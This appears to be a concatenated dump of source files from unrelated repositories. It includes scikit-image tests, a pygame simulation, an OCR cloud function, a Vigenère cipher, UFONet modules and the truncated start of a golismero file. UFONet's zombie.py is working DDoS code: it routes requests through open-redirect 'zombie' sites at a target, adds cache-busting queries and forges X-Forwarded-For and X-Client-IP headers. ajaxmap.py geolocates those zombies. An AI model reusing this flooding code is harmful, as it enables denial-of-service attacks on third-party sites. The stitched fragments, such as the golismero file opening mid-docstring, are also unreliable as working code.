res = np.tile([1, 1, 0, 1, 1, 0, 1, 1, 0, 1, 1, 0, 1, 1, 0, 1], (16, 1))
selem = np.ones((6, 6), dtype=np.uint8)
th = 1 * (test >= rank.otsu(test, selem))
assert_array_equal(th, res)
def test_entropy():
# verify that entropy is coherent with bitdepth of the input data
selem = np.ones((16, 16), dtype=np.uint8)
# 1 bit per pixel
data = np.tile(np.asarray([0, 1]), (100, 100)).astype(np.uint8)
assert(np.max(rank.entropy(data, selem)) == 1)
# 2 bit per pixel
data = np.tile(np.asarray([[0, 1], [2, 3]]), (10, 10)).astype(np.uint8)
assert(np.max(rank.entropy(data, selem)) == 2)
# 3 bit per pixel
data = np.tile(
np.asarray([[0, 1, 2, 3], [4, 5, 6, 7]]), (10, 10)).astype(np.uint8)
assert(np.max(rank.entropy(data, selem)) == 3)
# 4 bit per pixel
data = np.tile(
np.reshape(np.arange(16), (4, 4)), (10, 10)).astype(np.uint8)
assert(np.max(rank.entropy(data, selem)) == 4)
# 6 bit per pixel
data = np.tile(
np.reshape(np.arange(64), (8, 8)), (10, 10)).astype(np.uint8)
assert(np.max(rank.entropy(data, selem)) == 6)
# 8-bit per pixel
data = np.tile(
np.reshape(np.arange(256), (16, 16)), (10, 10)).astype(np.uint8)
assert(np.max(rank.entropy(data, selem)) == 8)
# 12 bit per pixel
selem = np.ones((64, 64), dtype=np.uint8)
data = np.tile(
np.reshape(np.arange(4096), (64, 64)), (2, 2)).astype(np.uint16)
assert(np.max(rank.entropy(data, selem)) == 12)
# make sure output is of dtype double
out = rank.entropy(data, np.ones((16, 16), dtype=np.uint8))
assert out.dtype == np.double
def test_selem_dtypes():
image = np.zeros((5, 5), dtype=np.uint8)
out = np.zeros_like(image)
mask = np.ones_like(image, dtype=np.uint8)
image[2, 2] = 255
image[2, 3] = 128
image[1, 2] = 16
for dtype in (np.uint8, np.uint16, np.int32, np.int64,
np.float32, np.float64):
elem = np.array([[0, 0, 0], [0, 1, 0], [0, 0, 0]], dtype=dtype)
rank.mean(image=image, selem=elem, out=out, mask=mask,
shift_x=0, shift_y=0)
assert_array_equal(image, out)
rank.mean_percentile(image=image, selem=elem, out=out, mask=mask,
shift_x=0, shift_y=0)
assert_array_equal(image, out)
def test_16bit():
image = np.zeros((21, 21), dtype=np.uint16)
selem = np.ones((3, 3), dtype=np.uint8)
for bitdepth in range(17):
value = 2 ** bitdepth - 1
image[10, 10] = value
assert rank.minimum(image, selem)[10, 10] == 0
assert rank.maximum(image, selem)[10, 10] == value
assert rank.mean(image, selem)[10, 10] == int(value / selem.size)
def test_bilateral():
image = np.zeros((21, 21), dtype=np.uint16)
selem = np.ones((3, 3), dtype=np.uint8)
image[10, 10] = 1000
image[10, 11] = 1010
image[10, 9] = 900
assert rank.mean_bilateral(image, selem, s0=1, s1=1)[10, 10] == 1000
assert rank.pop_bilateral(image, selem, s0=1, s1=1)[10, 10] == 1
assert rank.mean_bilateral(image, selem, s0=11, s1=11)[10, 10] == 1005
assert rank.pop_bilateral(image, selem, s0=11, s1=11)[10, 10] == 2
def test_percentile_min():
# check that percentile p0 = 0 is identical to local min
img = data.camera()
img16 = img.astype(np.uint16)
selem = disk(15)
# check for 8bit
img_p0 = rank.percentile(img, selem=selem, p0=0)
img_min = rank.minimum(img, selem=selem)
assert_array_equal(img_p0, img_min)
# check for 16bit
img_p0 = rank.percentile(img16, selem=selem, p0=0)
img_min = rank.minimum(img16, selem=selem)
assert_array_equal(img_p0, img_min)
def test_percentile_max():
# check that percentile p0 = 1 is identical to local max
img = data.camera()
img16 = img.astype(np.uint16)
selem = disk(15)
# check for 8bit
img_p0 = rank.percentile(img, selem=selem, p0=1.)
img_max = rank.maximum(img, selem=selem)
assert_array_equal(img_p0, img_max)
# check for 16bit
img_p0 = rank.percentile(img16, selem=selem, p0=1.)
img_max = rank.maximum(img16, selem=selem)
assert_array_equal(img_p0, img_max)
def test_percentile_median():
# check that percentile p0 = 0.5 is identical to local median
img = data.camera()
img16 = img.astype(np.uint16)
selem = disk(15)
# check for 8bit
img_p0 = rank.percentile(img, selem=selem, p0=.5)
img_max = rank.median(img, selem=selem)
assert_array_equal(img_p0, img_max)
# check for 16bit
img_p0 = rank.percentile(img16, selem=selem, p0=.5)
img_max = rank.median(img16, selem=selem)
assert_array_equal(img_p0, img_max)
def test_sum():
# check the number of valid pixels in the neighborhood
image8 = np.array([[0, 0, 0, 0, 0],
[0, 1, 1, 1, 0],
[0, 1, 1, 1, 0],
[0, 1, 1, 1, 0],
[0, 0, 0, 0, 0]], dtype=np.uint8)
image16 = 400*np.array([[0, 0, 0, 0, 0],
[0, 1, 1, 1, 0],
[0, 1, 1, 1, 0],
[0, 1, 1, 1, 0],
[0, 0, 0, 0, 0]], dtype=np.uint16)
elem = np.ones((3, 3), dtype=np.uint8)
out8 = np.empty_like(image8)
out16 = np.empty_like(image16)
mask = np.ones(image8.shape, dtype=np.uint8)
r = np.array([[1, 2, 3, 2, 1],
[2, 4, 6, 4, 2],
[3, 6, 9, 6, 3],
[2, 4, 6, 4, 2],
[1, 2, 3, 2, 1]], dtype=np.uint8)
rank.sum(image=image8, selem=elem, out=out8, mask=mask)
assert_array_equal(r, out8)
rank.sum_percentile(image=image8, selem=elem, out=out8, mask=mask,p0=.0,p1=1.)
assert_array_equal(r, out8)
rank.sum_bilateral(image=image8, selem=elem, out=out8, mask=mask,s0=255,s1=255)
assert_array_equal(r, out8)
r = 400* np.array([[1, 2, 3, 2, 1],
[2, 4, 6, 4, 2],
[3, 6, 9, 6, 3],
[2, 4, 6, 4, 2],
[1, 2, 3, 2, 1]], dtype=np.uint16)
rank.sum(image=image16, selem=elem, out=out16, mask=mask)
assert_array_equal(r, out16)
rank.sum_percentile(image=image16, selem=elem, out=out16, mask=mask,p0=.0,p1=1.)
assert_array_equal(r, out16)
rank.sum_bilateral(image=image16, selem=elem, out=out16, mask=mask,s0=1000,s1=1000)
assert_array_equal(r, out16)
if __name__ == "__main__":
run_module_suite()
```
#### File: skimage/util/_regular_grid.py
```python
import numpy as np
def regular_grid(ar_shape, n_points):
"""Find `n_points` regularly spaced along `ar_shape`.
The returned points (as slices) should be as close to cubically-spaced as
possible. Essentially, the points are spaced by the Nth root of the input
array size, where N is the number of dimensions. However, if an array
dimension cannot fit a full step size, it is "discarded", and the
computation is done for only the remaining dimensions.
Parameters
----------
ar_shape : array-like of ints
The shape of the space embedding the grid. ``len(ar_shape)`` is the
number of dimensions.
n_points : int
The (approximate) number of points to embed in the space.
Returns
-------
slices : list of slice objects
A slice along each dimension of `ar_shape`, such that the intersection
of all the slices give the coordinates of regularly spaced points.
Examples
--------
>>> ar = np.zeros((20, 40))
>>> g = regular_grid(ar.shape, 8)
>>> g
[slice(5.0, None, 10.0), slice(5.0, None, 10.0)]
>>> ar[g] = 1
>>> ar.sum()
8.0
>>> ar = np.zeros((20, 40))
>>> g = regular_grid(ar.shape, 32)
>>> g
[slice(2.0, None, 5.0), slice(2.0, None, 5.0)]
>>> ar[g] = 1
>>> ar.sum()
32.0
>>> ar = np.zeros((3, 20, 40))
>>> g = regular_grid(ar.shape, 8)
>>> g
[slice(1.0, None, 3.0), slice(5.0, None, 10.0), slice(5.0, None, 10.0)]
>>> ar[g] = 1
>>> ar.sum()
8.0
"""
ar_shape = np.asanyarray(ar_shape)
ndim = len(ar_shape)
unsort_dim_idxs = np.argsort(np.argsort(ar_shape))
sorted_dims = np.sort(ar_shape)
space_size = float(np.prod(ar_shape))
if space_size <= n_points:
return [slice(None)] * ndim
stepsizes = (space_size / n_points) ** (1.0 / ndim) * np.ones(ndim)
if (sorted_dims < stepsizes).any():
for dim in range(ndim):
stepsizes[dim] = sorted_dims[dim]
space_size = float(np.prod(sorted_dims[dim+1:]))
stepsizes[dim+1:] = ((space_size / n_points) **
(1.0 / (ndim - dim - 1)))
if (sorted_dims >= stepsizes).all():
break
starts = (stepsizes // 2).astype(int)
stepsizes = np.round(stepsizes).astype(int)
slices = [slice(start, None, step) for
start, step in zip(starts, stepsizes)]
slices = [slices[i] for i in unsort_dim_idxs]
return slices
```
|
{
"source": "JeyyGit/rock-paper-scissors-simulation",
"score": 3
}
|
#### File: JeyyGit/rock-paper-scissors-simulation/rps.py
```python
import pygame
import random
import math
pygame.init()
display = pygame.display.set_mode((600, 600))
clock = pygame.time.Clock()
FPS = 30
img_rock = pygame.image.load('emoji_rock.png').convert_alpha()
img_paper = pygame.image.load('emoji_paper.png').convert_alpha()
img_scissors = pygame.image.load('emoji_scissors.png').convert_alpha()
sfx_rock = pygame.mixer.Sound('sound_rock.wav')
sfx_paper = pygame.mixer.Sound('sound_paper.wav')
sfx_scissors = pygame.mixer.Sound('sound_scissors.wav')
class Item:
def __init__(self, xy, radius, velocity, type):
self.xy = xy
self.radius = radius
self.velocity = velocity
self.type = type
def draw(self):
x, y = map(int, self.xy)
if self.type == 'r':
img = img_rock
elif self.type == 'p':
img = img_paper
elif self.type == 's':
img = img_scissors
display.blit(img, (x, y))
def update(self):
self.xy[0] += self.velocity[0]
self.xy[1] += self.velocity[1]
self.draw()
def game():
items = []
for _ in range(30):
items.append(Item([random.randint(50, 550), random.randint(50, 550)], 10, [0, 0], 'r'))
items.append(Item([random.randint(50, 550), random.randint(50, 550)], 10, [0, 0], 'p'))
items.append(Item([random.randint(50, 550), random.randint(50, 550)], 10, [0, 0], 's'))
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
return
display.fill((255, 255, 255))
rocks = [item for item in items if item.type == 'r']
papers = [item for item in items if item.type == 'p']
sciss = [item for item in items if item.type == 's']
for item in items:
item.velocity = [random.randint(-1, 1), random.randint(-1, 1)]
walk = False
if item.type == 'r':
for sci in sciss:
if math.sqrt(pow(item.xy[0]-sci.xy[0], 2) + pow(item.xy[1]-sci.xy[1], 2)) <= item.radius + sci.radius:
sci.type = 'r'
sfx_rock.play()
break
sciss = [item for item in items if item.type == 's']
dir_x = 0
dir_y = 0
for sci in sciss:
walk = True
dir_x += item.xy[0] - sci.xy[0]
dir_y += item.xy[1] - sci.xy[1]
elif item.type == 'p':
for rock in rocks:
if math.sqrt(pow(item.xy[0]-rock.xy[0], 2) + pow(item.xy[1]-rock.xy[1], 2)) <= item.radius + rock.radius:
rock.type = 'p'
sfx_paper.play()
break
rocks = [item for item in items if item.type == 'r']
dir_x = 0
dir_y = 0
for rock in rocks:
walk = True
dir_x = item.xy[0] - rock.xy[0]
dir_y = item.xy[1] - rock.xy[1]
elif item.type == 's':
for paper in papers:
if math.sqrt(pow(item.xy[0]-paper.xy[0], 2) + pow(item.xy[1]-paper.xy[1], 2)) <= item.radius + paper.radius:
paper.type = 's'
sfx_scissors.play()
break
sciss = [item for item in items if item.type == 's']
dir_x = 0
dir_y = 0
for paper in papers:
walk = True
dir_x = item.xy[0] - paper.xy[0]
dir_y = item.xy[1] - paper.xy[1]
if walk:
walk = random.choice([True, False, True])
if walk:
if dir_x >= 0 and dir_y >= 0:
item.velocity[0] -= 1
item.velocity[1] -= 1
elif dir_x < 0 and dir_y >= 0:
item.velocity[0] += 1
item.velocity[1] -= 1
elif dir_x < 0 and dir_y < 0:
item.velocity[0] += 1
item.velocity[1] += 1
elif dir_x >= 0 and dir_y < 0:
item.velocity[0] -= 1
item.velocity[1] += 1
item.update()
pygame.display.update()
clock.tick(FPS)
game()
pygame.quit()
```
|
{
"source": "JeyzerMC/Google-Hackathon-2018",
"score": 3
}
|
#### File: JeyzerMC/Google-Hackathon-2018/test.py
```python
import base64
import requests
def get_ocr(request):
"""Responds to any HTTP request.
Args:
request (flask.Request): HTTP request object.
Returns:
The response text or any set of values that can be turned into a
Response object using
# flask.Flask.make_response>`.
`make_response <http://flask.pocoo.org/docs/1.0/api/
"""
headers = {
'content-type': 'application/json; charset=utf-8'
}
fl = request.files.get('imagefile', '')
if fl:
txt = base64.b64encode(fl.read())
# return 'txt %s' % txt
pdata = {
'requests': [
{
'image': {
'content': str(txt)
},
'features': [
{
'type': 'TEXT_DETECTION'
}
]
}
]
}
r = requests.post(
"https://vision.googleapis.com/v1/images:annotate?key=DONTPUSHKEY", headers=headers, data=pdata)
return 'res %s' % r.txt
data = request.data
if data:
return 'data %s' % data
args = request.args
if args:
return 'args %s' % args
return 'nada'
```
|
{
"source": "JeyZeta/Dangerous-",
"score": 4
}
|
#### File: Cifrado/vigenere/vigenere.py
```python
abc = 'abcdefghijklmnopqrstuvwxyz'
def cifrar(cadena, clave):
text_cifrar = ''
i = 0
for letra in cadena:
suma = abc.find(letra) + abc.find(clave[i % len(clave)])
modulo = int(suma) % len(abc)
text_cifrar = text_cifrar + str(abc[modulo])
i=i+1
return text_cifrar
def descifrar(cadena, clave):
text_cifrar = ''
i = 0
for letra in cadena:
suma = abc.find(letra) - abc.find(clave[i % len(clave)])
modulo = int(suma) % len(abc)
text_cifrar = text_cifrar + str(abc[modulo])
i=i+1
return text_cifrar
def main():
c = str(raw_input('cadena a cifrar: ')).lower()
clave = str(raw_input('clave: ')).lower()
print cifrar(c,clave)
c = str(raw_input('cadena a descifrar: ')).lower()
clave = str(raw_input('clave: ')).lower()
print descifrar(c,clave)
if __name__ == '__main__':
main()
```
#### File: ufonet/core/ajaxmap.py
```python
import socket, threading, re, base64, os, time
import webbrowser, subprocess, urllib2, json, sys
from urlparse import urlparse
from main import UFONet
import base64, traceback
try:
import pygeoip
except:
print "\nError importing: pygeoip lib. \n\n On Debian based systems:\n\n $ sudo apt-get install python-geoip\n"
sys.exit(2)
class AjaxMap(object):
def __init__(self):
self._geoip=None
self._geoasn=None
self._geoipstatus='nomap'
self._err=''
def get_err(self):
return self._err
# check for geoip data status
# basic lock file mechanism to avoid multiple downloads
def get_status(self):
if os.path.exists('maps.downloading'):
if not os.path.exists('maps.downloadmsg'):
f=open("maps.downloadmsg","wb")
f.write("")
f.close()
print "[Webgui] GeoIP data download started"
print "[Webgui] if this error message persists : remove maps.downloading and maps folder, then restart ufonet"
self._geoipstatus='downloading'
elif os.path.isdir('maps'):
if self._geoip == None :
self._geoip = pygeoip.GeoIP('maps/GeoLiteCity.dat')
if self._geoasn == None :
self._geoasn = pygeoip.GeoIP('maps/GeoIPASNum.dat')
if os.path.exists("maps.downloadmsg") :
os.remove("maps.downloadmsg")
self._geoipstatus='ok'
return self._geoipstatus
def retrieve(self,url,name):
try:
handle = urllib2.urlopen(url)
CHUNK = 16384
with open(name,'wb') as fp:
while True:
chunk = handle.read(CHUNK)
if not chunk:
break
fp.write(chunk)
except:
traceback.print_exc()
def download_maps(self):
import subprocess, shlex
# generate geolocation values on a map
if self.get_status() != 'nomap':
return self._geoipstatus == 'ok'
if os.path.exists("maps.downloadmsg"):
os.remove("maps.downloadmsg")
f=open("maps.downloading",'w')
f.write("download started<script>$'('#ufomsg').load('/js/ajax.js?fetchmap=')")
f.close()
self._geoipstatus="downloading"
# download maps folder
geo_db_mirror1 = 'http://172.16.31.10/bordercheck/maps.tar.gz' # Turina Server
geo_db_mirror2 = 'http://8172.16.58.3/bordercheck/maps.tar.gz' # Mirror
try: # mirror 1
print "\n[Info] - Fetching maps from 'Mirror 1':", geo_db_mirror1 + "\n"
response = self.retrieve(geo_db_mirror1, 'maps.tar.gz')
except:
try: # mirror 2
print "[Error] - Mirror 1':", geo_db_mirror1 + " Failed!\n"
print "[Info] - Fetching maps from 'Mirror 2':", geo_db_mirror2 + "\n"
response = self.retrieve(geo_db_mirror2, 'maps.tar.gz')
except:
print("[Error] - Something wrong fetching maps from mirrors ...Aborting!"), "\n"
traceback.print_exc()
return False #sys.exit(2)
subprocess.call(shlex.split('tar zxfv maps.tar.gz'))
print "\n[Info] GeoIP maps and databases: ready!\n"
# set pygeoip data sources
self._geoip = pygeoip.GeoIP('maps/GeoLiteCity.dat')
self._geoasn = pygeoip.GeoIP('maps/GeoIPASNum.dat')
self._geoipstatus='ok'
os.remove('maps.tar.gz')
os.remove('maps.downloading')
return True
# fetches geoip data for specified zombie
def geo_ip(self, zombie):
# check for status, downloading is done by ajax() method
if self.get_status() != 'ok':
if self._geoipstatus =='downloading':
print "\n[Info] GeoIP maps and databases: downloading\n"
self._err= "ufomsg('downloading maps...')"
elif not os.path.exists('maps/GeoIPASNum.dat') or not os.path.exists('maps/GeoLiteCity.dat'):
print "\n[Info] GeoIP maps and databases: download starting!\n"
self._err= "ufomsg('map download starting')\n$('#ufomsg').load('/js/ajax.js?fetchgeoip=')"
else:
print "\n[Info] GeoIP maps and databases: unknown error\n"
self._err= "ufomsg('maps: unknown error...')"
return None
if re.match(r'^127\.\d{1,3}\.\d{1,3}\.\d{1,3}$', zombie) or re.match(r'^10\.\d{1,3}\.\d{1,3}\.\d{1,3}$', zombie) or re.match(r'^192.168\.\d{1,3}\.\d{1,3}$', zombie) or re.match(r'^172.(1[6-9]|2[0-9]|3[0-1]).[0-9]{1,3}.[0-9]{1,3}$', zombie) or re.match('localhost', zombie):
self._err= "ufomsg('maps: invalid ip data...')"
return None
# create geoip data skeleton
geo_zombie={}
geo_zombie['qq']=zombie
url = urlparse(zombie)
geo_zombie['city'] = '-'
geo_zombie['country'] = '-'
geo_zombie['country_code'] = '-'
geo_zombie['longitude'] = '-'
geo_zombie['latitude'] = '-'
geo_zombie['ip'] = '-'
geo_zombie['host_name'] = '-'
geo_zombie['asn'] = '-'
geo_zombie['latitude'] = '-'
# retrieve and allocate geoip data
try:
ip = socket.gethostbyname(url.netloc)
except:
self._err= "ufomsg('geoip: hostbyname failed for "+str(url.netloc)+"...')"
return None
if re.match(r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$",ip):
geo_zombie['ip'] = ip
try:
record = self._geoip.record_by_addr(ip)
except:
self._err= "ufomsg('geoip: lookup failed for "+ip+", page reload required...')"
return None
try:
asn = self._geoasn.org_by_addr(ip)
if asn is not None:
geo_zombie['asn'] = asn.encode('utf-8')
except:
geo_zombie['asn'] = 'No ASN provided'
try:
geo_zombie['host_name'] = socket.gethostbyaddr(ip)[0].encode('utf-8')
except:
geo_zombie['host_name'] = 'No hostname'
try:
longitude = str(float(record['longitude']))
geo_zombie['longitude'] = longitude
latitude = str(float(record['latitude']))
geo_zombie['latitude'] = latitude
except:
pass
try:
geo_zombie['country'] = record["country_name"].encode('utf-8')
geo_zombie['country_code'] = record["country_code"].lower().encode('utf-8')
if record['city'] is not None:
geo_zombie['city'] = record["city"].encode('utf-8')
except:
pass
return geo_zombie
# generates javascipt for adding a new zombie with geoip data
def get_js(self,z):
ret = ""
gz = self.geo_ip(z)
if gz is not None and gz['latitude']!= '-':
ret = "Zombies.add('"+z+"',Array(new L.LatLng("+str(gz['latitude'])+","+str(gz['longitude'])+"),'"+gz['city']+"','"+gz['country']+"','"+gz['country_code']+"','"+gz['asn']+"','"+gz['ip']+"','"+gz['host_name']+"'))\n"
else:
print 'geozombie dead : ',z
ret += "dead_zombies.push('"+z+"')\n"
ret += "last_zombie = '"+z+"'\n"
return ret
# fetches next zombie from list
def get_next_zombie(self,name):
ufonet = UFONet()
ufonet.create_options()
zombies = ufonet.extract_zombies()
if name in zombies :
for z in zombies :
if name == None:
return z
if z == name :
name = None
return None
else:
return zombies[0]
# ajax controller
def ajax(self,pGet={}):
if 'fetchgeoip' in pGet.keys():
if self.get_status() == "nomap":
self.download_maps()
return "geoip data download done<br/>"
if 'stats' in pGet.keys():
stat='<script>$(".ufo_stat_div").show()</script>'
if os.path.exists('/tmp/ufonet.html'):
for x in open(r'/tmp/ufonet.html').readlines():
stat = stat + x
else:
stat="<i>Waiting for statistics generation...</i>"
return stat+"</div>"
if self.get_status() != "ok":
dljs=""
if self.get_status() == "nomap":
dljs+="$('#ufomsg').load('/js/ajax.js?fetchgeoip=')\n"
if 'doll' in pGet.keys():
dljs+="$('#ufomsg').load('/js/ajax.js?fetchdoll="+pGet['doll']+"')\n"
dljs+="doll=new Doll('"+pGet["doll"]+"')\n"
return "GeoIP data download in progress...<br><i>see console for errors</i>+<script>"+dljs+"</script>"
if 'zombie' in pGet.keys():
zn=base64.b64decode(pGet['zombie'])
nzn=self.get_next_zombie(zn)
if nzn is not None:
zombie=self.get_js(nzn)
return """ <script>
"""+zombie+"""
ufomsg('Adding zombie """+nzn+"""...')
</script>"""
else:
return "<script>zdone=true\nufomsg('all zombies ready !')\n </script>\n"
if 'fetchdoll' in pGet.keys():
tn=pGet['fetchdoll']
target = self.geo_ip(tn)
if target is None:
return "doll waiting for geoip data !"
return """ doll up !<script>
doll.setData(Array(new L.LatLng("""+str(target['latitude'])+","+str(target['longitude'])+"),'"+target['city']+"','"+target['country']+"','"+target['country_code']+"','"+target['asn']+"','"+target['ip']+"','"+target['host_name']+"'))\nufomsg('Adding target """+tn+"""...')\ndoll.show() </script>"""
if 'doll' in pGet.keys():
tn=pGet['doll']
print "loading doll ",tn
return """<script>
doll=new Doll('"""+tn+"""')\n</script>"""
return "\n"
```
#### File: ufonet/core/update.py
```python
import os
from subprocess import PIPE
from subprocess import Popen as execute
class Updater(object):
"""
Update UFONet automatically from a .git repository
"""
def __init__(self):
GIT_REPOSITORY = "https://github.com/epsylon/ufonet"
rootDir = os.path.abspath(os.path.join(os.path.dirname( __file__ ), '..', ''))
if not os.path.exists(os.path.join(rootDir, ".git")):
print "Not any .git repository found!\n"
print "="*30
print "\nYou should clone UFONet manually with:\n"
print "$ git clone %s" % GIT_REPOSITORY
else:
checkout = execute("git checkout .", shell=True, stdout=PIPE, stderr=PIPE).communicate()[0]
if "fast-forwarded" in checkout:
pull = execute("git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE, stderr=PIPE).communicate()
print "Congratulations!! UFONet has been updated to latest version ;-)\n"
else:
print "You are updated! ;-)\n"
```
#### File: ufonet/core/zombie.py
```python
import pycurl, StringIO, md5, re
import time, threading, random
from randomip import RandomIP
class Zombie: # class representing a zombie
# constructor: function to construct a zombie
# ufo: UFONet object, some state variables are recovered as well
# zombie: name/url of zombie
def __init__(self, ufo, zombie):
self.ufo = ufo
self.payload=ufo.payload
self.attack_mode=ufo.attack_mode
self.zombie = zombie
self.connection_failed=True
# wait for semaphore to be ready, add to herd, connect & suicide
def connect(self):
reply=None
with self.ufo.sem:
self.ufo.herd.new_zombie(self.zombie)
reply=self.do_connect()
self.ufo.herd.kill_zombie(self.zombie, reply, self.connection_failed)
return reply
# handles zombie connection
def do_connect(self):
# connect zombies and manage different options: HEAD, GET, POST,
# user-Agent, referer, timeout, retries, threads, delay..
options = self.ufo.options
c = pycurl.Curl()
if self.ufo.head == True:
c.setopt(pycurl.URL, self.zombie) # set 'self.zombie' target
c.setopt(pycurl.NOBODY, 1) # use HEAD
if self.payload == True:
payload = self.zombie + "https://www.whitehouse.gov" #Open Redirect payload [requested by all UFONet motherships ;-)]
c.setopt(pycurl.URL, payload) # set 'self.zombie' payload
c.setopt(pycurl.NOBODY, 0) # use GET
if self.ufo.external == True:
external_service = "http://www.downforeveryoneorjustme.com/" # external check
if options.target.startswith('https://'): # fixing url prefix
options.target = options.target.replace('https://','')
if options.target.startswith('http://'): # fixing url prefix
options.target = options.target.replace('http://','')
external = external_service + options.target
c.setopt(pycurl.URL, external) # external HEAD check before to attack
c.setopt(pycurl.NOBODY, 0) # use GET
if self.attack_mode == True:
if options.place: # use self.zombie's vector to connect to a target's place and add a random query to evade cache
random_name_hash = random.randint(1, 100000000)
random_hash = random.randint(1, 100000000)
if options.place.endswith("/"):
options.place = re.sub('/$', '', options.place)
if options.place.startswith("/"):
if "?" in options.place:
url_attack = self.zombie + options.target + options.place + "&" + str(random_name_hash) + "=" + str(random_hash)
else:
url_attack = self.zombie + options.target + options.place + "?" + str(random_name_hash) + "=" + str(random_hash)
else:
if "?" in options.place:
url_attack = self.zombie + options.target + "/" + options.place + "&" + str(random_name_hash) + "=" + str(random_hash)
else:
url_attack = self.zombie + options.target + "/" + options.place + "?" + str(random_name_hash) + "=" + str(random_hash)
else:
url_attack = self.zombie + options.target # Use self.zombie vector to connect to original target url
if self.ufo.options.verbose:
print "[INFO] Payload:", url_attack
c.setopt(pycurl.URL, url_attack) # GET connection on target site
c.setopt(pycurl.NOBODY, 0) # use GET
# set fake headers (important: no-cache)
fakeheaders = ['Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg',
'Connection: Keep-Alive',
'Content-type: application/x-www-form-urlencoded; charset=UTF-8',
'Cache-control: no-cache',
'Pragma: no-cache',
'Pragma-directive: no-cache',
'Cache-directive: no-cache',
'Expires: 0']
c.setopt(pycurl.FOLLOWLOCATION, 1) # set follow redirects
c.setopt(pycurl.MAXREDIRS, 10) # set max redirects
c.setopt(pycurl.SSL_VERIFYHOST, 0) # don't verify host
c.setopt(pycurl.SSL_VERIFYPEER, 0) # don't verify peer
c.setopt(pycurl.SSLVERSION, pycurl.SSLVERSION_SSLv3) # sslv3
c.setopt(pycurl.COOKIEFILE, '/dev/null') # black magic
c.setopt(pycurl.COOKIEJAR, '/dev/null') # black magic
c.setopt(pycurl.FRESH_CONNECT, 1) # important: no cache!
if options.xforw: # set x-forwarded-for
generate_random_xforw = RandomIP()
xforwip = generate_random_xforw._generateip('')
xforwfakevalue = ['X-Forwarded-For: ' + str(xforwip)]
fakeheaders = fakeheaders + xforwfakevalue
if options.xclient: # set x-client-ip
generate_random_xclient = RandomIP()
xclientip = generate_random_xclient._generateip('')
xclientfakevalue = ['X-Client-IP: ' + str(xclientip)]
fakeheaders = fakeheaders + xclientfakevalue
if options.host: # set http host header
host_fakevalue = ['Host: ' + str(options.host)]
fakeheaders = fakeheaders + host_fakevalue
c.setopt(pycurl.HTTPHEADER, fakeheaders) # set fake headers
b = StringIO.StringIO()
c.setopt(pycurl.HEADERFUNCTION, b.write)
h = StringIO.StringIO()
c.setopt(pycurl.WRITEFUNCTION, h.write)
if options.agent: # set user-agent
c.setopt(pycurl.USERAGENT, options.agent)
else:
c.setopt(pycurl.USERAGENT, self.ufo.user_agent)
if options.referer: # set referer
c.setopt(pycurl.REFERER, options.referer)
else:
c.setopt(pycurl.REFERER, self.ufo.referer)
if options.proxy: # set proxy
c.setopt(pycurl.PROXY, options.proxy)
else:
c.setopt(pycurl.PROXY, '')
if options.timeout: # set timeout
c.setopt(pycurl.TIMEOUT, options.timeout)
c.setopt(pycurl.CONNECTTIMEOUT, options.timeout)
else:
c.setopt(pycurl.TIMEOUT, 10)
c.setopt(pycurl.CONNECTTIMEOUT, 10)
if options.delay: # set delay
self.ufo.delay = options.delay
else:
self.ufo.delay = 0
if options.retries: # set retries
self.ufo.retries = options.retries
else:
self.ufo.retries = 1
try: # try to connect
c.perform()
time.sleep(self.ufo.delay)
self.connection_failed = False
except Exception, e: # try retries
for count in range(0, self.ufo.retries):
time.sleep(self.ufo.delay)
try:
c.perform()
self.connection_failed = False
except:
self.connection_failed = True
if self.ufo.head == True: # HEAD reply
code_reply = c.getinfo(pycurl.HTTP_CODE)
reply = b.getvalue()
if options.verbose:
print "Reply:"
print "\n", reply
return code_reply
if self.ufo.external == True: # External reply
external_reply = h.getvalue()
if options.verbose:
print "Reply:"
print "\n", external_reply
return external_reply
if self.payload == True: # Payloads reply
payload_reply = h.getvalue()
if options.verbose:
print "Reply:"
print "\n", payload_reply
return payload_reply
if self.attack_mode == True: # Attack mode reply
attack_reply = h.getvalue()
if options.verbose:
print "[Response] code: ", c.getinfo(c.RESPONSE_CODE)," time ",c.getinfo(c.TOTAL_TIME)," size ", len(attack_reply)
return [ c.getinfo(c.RESPONSE_CODE),
c.getinfo(c.TOTAL_TIME),
len(attack_reply)]
```
#### File: golismero/api/external.py
```python
Golismero project site: https://github.com/golismero
Golismero project mail: <EMAIL>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
__all__ = [
# Run an external tool.
"run_external_tool",
# Bundled tools folder.
"get_tools_folder",
# Temporary file utility functions.
"tempfile",
"tempdir",
# Executable file utility functions.
"is_executable",
"get_interpreter",
"find_binary_in_path",
# Cygwin utility functions.
"is_cygwin_binary",
"get_cygwin_binary",
"find_cygwin_binary_in_path",
"win_to_cygwin_path",
"cygwin_to_win_path",
]
from ..common import get_tools_folder # exported
import contextlib
import re
import os
import os.path
import ntpath
import subprocess
import stat
import shlex
import sys
from shutil import rmtree
from tempfile import NamedTemporaryFile, mkdtemp
# Needed on non-Windows platforms to prevent a syntax error.
try:
WindowsError
except NameError:
class WindowsError(OSError): pass
#------------------------------------------------------------------------------
class ExternalToolError(RuntimeError):
"""
An error occurred when running an external tool.
"""
def __init__(self, msg, errcode):
super(ExternalToolError, self).__init__(self, msg)
self.errcode = errcode
#------------------------------------------------------------------------------
def run_external_tool(command, args = None, env = None, cwd = None,
callback = None):
"""
Run an external tool and optionally fetch the output.
Standard output and standard error are combined into a single stream.
Newline characters are always '\\n' in all platforms.
.. warning: SECURITY WARNING: Be *extremely* careful when passing
data coming from the target servers to this function.
Failure to properly validate the data may result in
complete compromise of your machine! See:
https://www.owasp.org/index.php/Command_Injection
Example:
>>> def callback(line):
... print line
...
>>> run_external_tool("uname", callback=callback)
Linux
:param command: Command to execute.
:type command: str
:param args: Arguments to be passed to the command.
:type args: list(str)
:param env: Environment variables to be passed to the command.
:type env: dict(str -> str)
:param cwd: Current directory while running the tool.
This is useful for tools that require you to be standing on a specific
directory when running them.
:type cwd: str | None
:param callback: Optional callback function. If given, it will be called
